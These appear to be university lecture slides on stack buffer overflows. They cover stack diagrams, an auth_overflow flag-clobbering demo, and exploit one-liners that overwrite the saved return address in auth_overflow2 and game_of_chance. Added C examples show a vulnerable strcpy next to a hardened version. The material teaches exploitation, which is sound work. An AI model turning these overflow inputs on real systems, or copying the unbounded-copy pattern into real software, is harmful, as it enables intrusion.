MBE - 02/10/2015
Memory Corruption
Setup
Lab info
Submissions for the first lab are due beginning of class Friday
To submit solutions, email mbespring2015+lab1@gmail.com
Follow instructions in the README: http://security.cs.rpi.edu/~jblackthorne/README.txt
Lecture Overview
Definition
Buffer overflows
How-to techniques/workflows
Modifying data/stack
Modifying control flow
What is it?
fun
Modifying a binary's memory in a way that was not intended
Broad umbrella term for most of what the rest of this class will be
The vast majority of system-level exploits (real-world and competition) involve memory corruption
0-overflow_example
Read and understand it
Compile and play with it
What does the stack look like?
0-overflow_example stack
before
0-overflow_example stack
after
0-overflow_example stack
after--exploited
Buffer Overflows
Whoa.
--Keanu Reeves
That's pretty much it
Now, what can we do with that?
1-auth_overflow
Read and understand it
Compile and play with it
What does the stack look like?
1-auth_overflow stack
before strcpy
1-auth_overflow stack
after strcpy
1-auth_overflow code
auth check
1-auth_overflow stack
after strcpy: let's look at this again
1-auth_overflow stack
oh, that's handy
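The flag-clobbering pattern the 1-auth_overflow slides walk through, as an added example that is not the course's own code: the unsafe check next to a hardened one. PASSWORD is a constructed placeholder and the function names are assumptions; which side of password_buffer the compiler puts auth_flag on is not guaranteed (the 3-auth_overflow2 slides show the other layout), so the unsafe version is shown but never driven past its buffer here.

```c
#include <stdio.h>
#include <string.h>

/* Constructed placeholder password; the course binaries use their own. */
#define PASSWORD "correct-horse"

/* The pattern from the 1-auth_overflow slides: an unbounded strcpy into a
 * 16-byte stack buffer that sits next to the flag the caller trusts.
 * Where the compiler places auth_flag relative to password_buffer is not
 * guaranteed (that is exactly the difference between 1-auth_overflow and
 * 3-auth_overflow2), but either way a password of 16 or more characters
 * writes past the buffer: into auth_flag, or into the saved ebp/eip. */
int check_authentication_unsafe(const char *password)
{
    int auth_flag = 0;
    char password_buffer[16];

    strcpy(password_buffer, password);      /* no length check: the bug */
    if (strcmp(password_buffer, PASSWORD) == 0)
        auth_flag = 1;
    return auth_flag;
}

/* Hardened form: check the length before any copy and fail closed on
 * over-long input, so nothing is ever written past password_buffer.
 * strncpy alone would not do: it does not NUL-terminate on truncation. */
int check_authentication_safe(const char *password)
{
    char password_buffer[16];
    size_t len = strlen(password);

    if (len >= sizeof password_buffer)
        return 0;                            /* too long: Access Denied */
    memcpy(password_buffer, password, len + 1);   /* copies the NUL too */
    return strcmp(password_buffer, PASSWORD) == 0;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <password>\n", argv[0]);
        return 1;
    }
    /* Only the safe check is run here; calling the unsafe one with a long
     * argument is the undefined behaviour the lecture is about. */
    puts(check_authentication_safe(argv[1]) ? "Access Granted." : "Access Denied.");
    return 0;
}
```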
Note: when copying and pasting from slides or documents, double-check that the quotation marks are straight ( ' ) and not "smart" curly quotes ( ‘ or ’ )
2-arg_input_echo
Test program that echoes your argument
Challenges:
hex: 0x41414141
int: 1094795585
int: 1094795586
hex: 0x01010101
Hint: pcalc
2-arg_input_echo solutions
hex: 0x41414141
$ ./arg_input_echo AAAA
int: 1094795585
$ ./arg_input_echo AAAA
int: 1094795586
$ ./arg_input_echo BAAA
hex: 0x01010101
$ ./arg_input_echo `printf '\x01\x01\x01\x01'`
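An added example, not the course's arg_input_echo program, that reproduces what that program computes from argv[1] and adds the reverse direction the pcalc hint is for. le32_from_arg and le32_to_arg are hypothetical names, and the output format assumes the slide's hex:/int: lines.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* What the lecture's 2-arg_input_echo sees on a little-endian x86 box when
 * it treats the first four bytes of argv[1] as a 32-bit integer: byte 0 is
 * the least significant, so "BAAA" is one more than "AAAA". Bytes missing
 * from a short argument count as zero. */
uint32_t le32_from_arg(const char *arg)
{
    uint32_t value = 0;
    size_t len = strlen(arg);

    for (size_t i = 0; i < 4 && i < len; i++)
        value |= (uint32_t)(unsigned char)arg[i] << (8 * i);
    return value;
}

/* The reverse direction (what pcalc is used for on the slide): the four
 * bytes, in argv order, that make the program see a given value. Returns
 * how many of them are not printable ASCII, i.e. cannot be typed and need
 * printf '\xNN' instead, as with 0x01010101. */
int le32_to_arg(uint32_t value, unsigned char out[4])
{
    int unprintable = 0;

    for (int i = 0; i < 4; i++) {
        out[i] = (unsigned char)(value >> (8 * i));
        if (out[i] < 0x20 || out[i] > 0x7e)
            unprintable++;
    }
    return unprintable;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <arg>\n", argv[0]);
        return 1;
    }
    uint32_t v = le32_from_arg(argv[1]);
    printf("hex: 0x%08x\nint: %u\n", v, v);   /* same two lines as the slide */
    return 0;
}
```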
Print ABCD
$ echo -e '\x41\x42\x43\x44'
$ printf '\x41\x42\x43\x44'
$ python -c 'print "\x41\x42\x43\x44"'
$ perl -e 'print "\x41\x42\x43\x44";'
Print 100 As
$ echo/printf (hold down alt; type 100) A
$ python -c 'print "A"*100'
$ perl -e 'print "A" x 100;'
BASH refresher
http://stackoverflow.com/a/24998887
gdb io
Use command output as an argument
$ r $(your_command_here)
3-auth_overflow2
Read and understand it
Compile and play with it
What does the stack look like?
3-auth_overflow2.c diff
difference from 1-auth_overflow
3-auth_overflow2.c stack
uh-oh
3-auth_overflow2.c
now what?
take control
Process memory layout (figure on the slide):
Libraries (libc)
ELF Executable: .text segment, .data segment
Heap
Stack (top of stack at 0xbfff0000)
0xFFFFFFFF: end of memory
3-auth_overflow2.c exercise
Take out a sheet of paper
Diagram the stack
Currently right before the strcpy call
3-auth_overflow2.c exercise
Stack right before the strcpy call, low address at the top, high address at the bottom:
low address
  &password_buffer   strcpy arguments (first argument, dest;
  &password          second argument, src)
  ???
  auth_flag
  local vars
  password_buffer
  ???
  old ebp
  old eip            IMPORTANT
  &password          argument
  ???
high address
3-auth_overflow2.c main
where do we want to go?
3-auth_overflow2.c stack
let's put it together now
3-auth_overflow2.c stack
r AAAAAAAAAAAAAAAAAAAAAAAAAAAA$(printf '\xbf\x84\x04\x08\xbf')
4-game_of_chance
Read and understand it
Compile and play with it
Where's the vulnerability?
How do you exploit it?
4-game_of_chance.c
perl -e 'print "1\n5\nn\n5\n" . "A" x100 . "\x70\x8d\x04\x08\n" . "1\nn\n" . "7\n"' | sudo ./game_of_chance
Heap overflows
Wow, you have until 04/10 before you have to deal with them
Questions?
Coming up
Next class (Fri) is a lab
After that (Tue) is a lecture on shellcoding